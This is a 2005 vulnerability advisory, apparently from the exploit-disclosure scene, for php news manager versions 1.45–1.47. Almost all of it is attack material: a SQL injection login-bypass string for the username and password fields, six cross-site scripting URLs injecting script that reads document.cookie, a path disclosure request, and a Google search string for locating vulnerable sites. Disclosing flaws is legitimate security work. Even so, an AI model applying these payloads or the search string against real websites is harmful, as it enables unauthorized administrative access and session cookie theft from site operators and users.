14.17 28/07/2005

php news manager 1.45/1.46/1.47 (last release date 2005-05-03)
login bypass/sql injection, multiple cross site scripting & path disclosure 


vulnerabilties has been tested on default installations avaliable on:
http://www.skintech.org/newman/downloads.php


login bypass/sql injection:

login:  whatever' or 'a'='a
pass:   whatever' or 'a'='a

(you can inject always true statements like 'a'='a' ....)

xss:
http://[target]/[path]/browse.php?newman_ver=</title><script>alert(document.cookie)</script>
http://[target]/[path]/header.php?title=</title><script>alert(document.cookie)</script>
http://[target]/[path]/header.php?logo="><script>alert(document.cookie)</script>
http://[target]/[path]/footer.php?newman_ver=<script>alert(document.cookie)</script>
http://[target]/[path]/gallery.php?newman_ver=</title><script>alert(document.cookie)</script>
http://[target]/[path]/newspix.php?newman_ver=</title><script>alert(document.cookie)</script>

path disclosure:
http://[target]/[path]/header.php

googledork:
"Powered by phpNewMan Version"

rgod
email: retrogod[at]aliceposta.it
site: http://rgod.altervista.org